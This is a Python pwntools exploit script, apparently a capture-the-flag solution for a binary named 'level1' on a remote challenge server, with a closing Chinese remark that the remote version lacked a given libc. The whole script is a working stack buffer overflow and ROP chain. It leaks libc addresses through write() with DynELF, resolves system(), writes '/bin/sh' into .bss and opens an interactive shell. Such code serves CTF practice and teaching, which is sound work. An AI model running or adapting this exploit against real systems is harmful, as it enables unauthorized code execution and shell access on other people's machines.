#-*-coding:utf-8 -*-
import pwn
from pwn import *
#pwn.context.log_level = 'debug'
#context(arch = 'i386', os = 'linux')
#shellcode = asm(shellcraft.sh())#用函数shellcraft.sh()直接生成shellcode
#asm
#io = process('./level1')
io = remote('111.198.29.45', 52614)
elf=ELF('./level1')
write_plt=elf.symbols['write']
write_got=elf.got['write']
read_plt=elf.symbols['read']
bss=elf.bss()
start=0x08048380
main=0x080484B7
def leak(address):
payload='a'*(0x88+4)+p32(write_plt)+p32(start)+p32(1)+p32(address)+p32(4)
#io.recvuntil("?\n") #本地和远程有区别,请注意这里!
io.send(payload)
leaked=io.recv(4)
print "[%s] -> [%s] = [%s]" % (hex(address),hex(u32(leaked)),repr(leaked))
return leaked
d=pwn.DynELF(leak,elf=ELF('./level1'))
system=d.lookup('system','libc')
print hex(system)
print
print hex(bss)
payload2='a'*(0x88+4)+p32(read_plt)+p32(0x08048549)+p32(0)+p32(bss)+p32(8)
payload2+=p32(system)+p32(0xdeadbeef)+p32(bss)
raw_input()
io.sendline(payload2)
io.send('/bin/sh\x00')
io.interactive()
本来是个简单的题(程序给出了buf地址),但是远程程序不一样,直接变成了无libc的PWN。
